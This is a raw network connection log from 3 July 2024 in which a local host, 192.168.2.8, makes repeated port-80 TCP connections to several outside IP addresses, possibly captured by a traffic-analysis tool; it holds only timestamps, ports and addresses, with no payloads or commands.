Jul 3, 2024 08:35:01.113965034 CEST	61441	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:35:01.116578102 CEST	61441	80	192.168.2.8	212.227.172.254
Jul 3, 2024 08:35:01.121371031 CEST	80	61441	212.227.172.254	192.168.2.8
Jul 3, 2024 08:35:14.445539951 CEST	61442	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:14.450402021 CEST	80	61442	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:14.450561047 CEST	61442	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:14.452619076 CEST	61442	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:14.457562923 CEST	80	61442	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:15.643043041 CEST	80	61442	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:15.643060923 CEST	80	61442	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:15.643069983 CEST	80	61442	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:15.643142939 CEST	61442	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:15.643152952 CEST	80	61442	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:15.643197060 CEST	61442	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:15.966878891 CEST	61442	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:16.985285044 CEST	61443	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:17.329375982 CEST	80	61443	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:17.329449892 CEST	61443	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:17.331293106 CEST	61443	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:17.336087942 CEST	80	61443	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:17.965835094 CEST	80	61443	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:17.966761112 CEST	80	61443	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:17.966821909 CEST	61443	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:18.842832088 CEST	61443	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:19.863202095 CEST	61444	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:19.868165016 CEST	80	61444	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:19.868247032 CEST	61444	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:19.870652914 CEST	61444	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:19.875619888 CEST	80	61444	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:19.875649929 CEST	80	61444	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:20.505794048 CEST	80	61444	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:20.505904913 CEST	80	61444	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:20.508800983 CEST	61444	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:21.373421907 CEST	61444	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:22.392765045 CEST	61445	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:22.397984028 CEST	80	61445	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:22.398114920 CEST	61445	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:22.399810076 CEST	61445	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:22.404695988 CEST	80	61445	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:23.047919035 CEST	80	61445	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:23.047980070 CEST	80	61445	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:23.048094034 CEST	61445	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:23.052649975 CEST	61445	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:35:23.057476997 CEST	80	61445	91.195.240.19	192.168.2.8
Jul 3, 2024 08:35:36.228305101 CEST	61446	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:36.234355927 CEST	80	61446	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:36.236767054 CEST	61446	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:36.240628958 CEST	61446	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:36.245672941 CEST	80	61446	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:37.748260021 CEST	61446	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:37.753691912 CEST	80	61446	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:37.753781080 CEST	61446	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:38.766721964 CEST	61447	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:38.771725893 CEST	80	61447	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:38.775101900 CEST	61447	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:38.778768063 CEST	61447	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:38.783679962 CEST	80	61447	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:40.279424906 CEST	61447	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:40.284678936 CEST	80	61447	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:40.288758993 CEST	61447	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:41.298002958 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:41.303044081 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:41.303119898 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:41.305214882 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:41.310292006 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:41.310364962 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613146067 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613172054 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613185883 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613199949 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613214016 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613225937 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613238096 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613251925 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613272905 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.613316059 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.613360882 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.613398075 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.616719961 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.619007111 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.619029045 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.619041920 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.619154930 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.670068026 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.713414907 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713430882 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713443041 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713570118 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713582039 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713593960 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.713745117 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713783026 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713794947 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.713804960 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.714229107 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.714279890 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.714291096 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.714303017 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.714369059 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.714380026 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.714488029 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.715102911 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.715157986 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.715169907 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.715179920 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.715262890 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.715274096 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.715334892 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.715334892 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.716005087 CEST	80	61448	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:42.716769934 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:42.810745001 CEST	61448	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:43.829984903 CEST	61449	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:44.419112921 CEST	80	61449	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:44.420722008 CEST	61449	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:44.422596931 CEST	61449	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:44.427535057 CEST	80	61449	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:45.591829062 CEST	80	61449	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:45.592236996 CEST	80	61449	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:45.592291117 CEST	61449	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:45.595135927 CEST	61449	80	192.168.2.8	109.95.158.122
Jul 3, 2024 08:35:45.602174044 CEST	80	61449	109.95.158.122	192.168.2.8
Jul 3, 2024 08:35:50.753999949 CEST	61450	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:50.758893013 CEST	80	61450	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:50.759341002 CEST	61450	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:50.761028051 CEST	61450	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:50.765880108 CEST	80	61450	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:51.366416931 CEST	80	61450	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:51.366440058 CEST	80	61450	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:51.366513968 CEST	61450	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:52.264656067 CEST	61450	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:53.282551050 CEST	61451	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:53.288084984 CEST	80	61451	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:53.288214922 CEST	61451	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:53.290265083 CEST	61451	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:53.295113087 CEST	80	61451	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:53.989362955 CEST	80	61451	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:53.989382029 CEST	80	61451	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:53.989392996 CEST	80	61451	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:53.989440918 CEST	61451	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:54.795217991 CEST	61451	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:55.814590931 CEST	61452	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:55.819602966 CEST	80	61452	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:55.819689989 CEST	61452	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:55.822321892 CEST	61452	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:55.827193022 CEST	80	61452	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:55.827286005 CEST	80	61452	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:56.439196110 CEST	80	61452	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:56.439233065 CEST	80	61452	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:56.439358950 CEST	61452	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:57.326607943 CEST	61452	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:58.348664999 CEST	61453	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:58.353739977 CEST	80	61453	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:58.358637094 CEST	61453	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:58.358637094 CEST	61453	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:58.363534927 CEST	80	61453	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:58.976526976 CEST	80	61453	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:58.976557016 CEST	80	61453	203.161.49.220	192.168.2.8
Jul 3, 2024 08:35:58.979408979 CEST	61453	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:58.979408979 CEST	61453	80	192.168.2.8	203.161.49.220
Jul 3, 2024 08:35:58.984671116 CEST	80	61453	203.161.49.220	192.168.2.8
Jul 3, 2024 08:36:04.304666042 CEST	61454	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:04.309591055 CEST	80	61454	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:04.314574003 CEST	61454	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:04.314574003 CEST	61454	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:04.319544077 CEST	80	61454	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:04.958619118 CEST	80	61454	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:04.961857080 CEST	80	61454	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:04.961955070 CEST	80	61454	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:04.961982012 CEST	61454	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:04.962198019 CEST	61454	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:05.826555967 CEST	61454	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:06.845043898 CEST	61455	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:06.850265026 CEST	80	61455	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:06.850418091 CEST	61455	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:06.852664948 CEST	61455	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:06.857584000 CEST	80	61455	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:07.494982958 CEST	80	61455	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:07.495004892 CEST	80	61455	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:07.495054960 CEST	61455	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:08.360668898 CEST	61455	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:09.379570007 CEST	61456	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:09.384479046 CEST	80	61456	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:09.384562969 CEST	61456	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:09.386637926 CEST	61456	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:09.391645908 CEST	80	61456	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:09.391663074 CEST	80	61456	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:10.029144049 CEST	80	61456	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:10.030770063 CEST	80	61456	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:10.030812025 CEST	61456	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:10.031203985 CEST	80	61456	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:10.031250000 CEST	61456	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:10.889015913 CEST	61456	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:11.908467054 CEST	61457	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:11.913587093 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:11.913665056 CEST	61457	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:11.915971994 CEST	61457	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:11.920831919 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.570111990 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.576738119 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.576778889 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.576788902 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.576841116 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.576850891 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.576864004 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:12.576888084 CEST	61457	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:12.577553034 CEST	61457	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:12.580677032 CEST	61457	80	192.168.2.8	35.227.248.111
Jul 3, 2024 08:36:12.589544058 CEST	80	61457	35.227.248.111	192.168.2.8
Jul 3, 2024 08:36:17.626991034 CEST	61458	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:17.631915092 CEST	80	61458	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:17.631993055 CEST	61458	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:17.634121895 CEST	61458	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:17.639544964 CEST	80	61458	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:18.287039042 CEST	80	61458	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:18.287162066 CEST	80	61458	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:18.287235975 CEST	61458	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:19.140669107 CEST	61458	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:20.157356977 CEST	61459	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:20.162282944 CEST	80	61459	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:20.162357092 CEST	61459	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:20.164222956 CEST	61459	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:20.169178963 CEST	80	61459	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:20.806572914 CEST	80	61459	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:20.806741953 CEST	80	61459	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:20.806791067 CEST	61459	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:21.670134068 CEST	61459	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:22.688612938 CEST	61460	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:22.701407909 CEST	80	61460	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:22.701492071 CEST	61460	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:22.703391075 CEST	61460	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:22.708359957 CEST	80	61460	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:22.710972071 CEST	80	61460	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:23.343283892 CEST	80	61460	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:23.388817072 CEST	61460	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:23.439763069 CEST	80	61460	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:23.439858913 CEST	61460	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:24.216999054 CEST	61460	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:25.235542059 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:25.245605946 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.245680094 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:25.248488903 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:25.257474899 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942310095 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942334890 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942354918 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942367077 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942378998 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942449093 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942460060 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942471027 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942481995 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942481995 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:25.942497015 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.942524910 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:25.942538023 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:25.947407007 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.947515965 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.947525024 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:25.947586060 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:26.039978981 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040015936 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040033102 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040045023 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040056944 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040100098 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:26.040186882 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:26.040221930 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040256023 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:26.040334940 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040345907 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040355921 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040376902 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:26.040952921 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:26.040988922 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:26.045403957 CEST	61461	80	192.168.2.8	91.195.240.19
Jul 3, 2024 08:36:26.050363064 CEST	80	61461	91.195.240.19	192.168.2.8
Jul 3, 2024 08:36:39.727065086 CEST	61462	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:39.732295990 CEST	80	61462	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:39.732377052 CEST	61462	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:39.734472036 CEST	61462	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:39.739485979 CEST	80	61462	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:40.632538080 CEST	80	61462	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:40.632606983 CEST	80	61462	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:40.634845018 CEST	61462	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:41.248292923 CEST	61462	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:42.266592026 CEST	61463	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:42.271625996 CEST	80	61463	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:42.274563074 CEST	61463	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:42.274563074 CEST	61463	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:42.279484987 CEST	80	61463	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:43.216133118 CEST	80	61463	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:43.216228962 CEST	80	61463	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:43.216377020 CEST	61463	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:43.779716015 CEST	61463	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:44.798181057 CEST	61464	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:44.803462029 CEST	80	61464	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:44.803574085 CEST	61464	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:44.808738947 CEST	61464	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:44.813649893 CEST	80	61464	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:44.813824892 CEST	80	61464	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:45.731050968 CEST	80	61464	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:45.731132030 CEST	80	61464	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:45.731179953 CEST	61464	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:46.312720060 CEST	61464	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:47.330070972 CEST	61465	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:47.335669041 CEST	80	61465	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:47.335742950 CEST	61465	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:47.337863922 CEST	61465	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:47.342701912 CEST	80	61465	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:48.244587898 CEST	80	61465	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:48.244631052 CEST	80	61465	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:48.244740009 CEST	61465	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:48.247942924 CEST	61465	80	192.168.2.8	47.239.13.172
Jul 3, 2024 08:36:48.252824068 CEST	80	61465	47.239.13.172	192.168.2.8
Jul 3, 2024 08:36:53.477804899 CEST	61466	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:53.483669043 CEST	80	61466	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:53.483743906 CEST	61466	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:53.486012936 CEST	61466	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:53.490880013 CEST	80	61466	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:54.998343945 CEST	61466	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:55.251805067 CEST	80	61466	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:56.019210100 CEST	61467	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:56.024666071 CEST	80	61467	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:56.024741888 CEST	61467	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:56.027282953 CEST	61467	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:56.032305956 CEST	80	61467	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:57.529872894 CEST	61467	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:57.583955050 CEST	80	61467	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:58.548731089 CEST	61468	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:58.556603909 CEST	80	61468	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:58.558705091 CEST	61468	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:36:58.558705091 CEST	61468	80	192.168.2.8	208.91.197.27
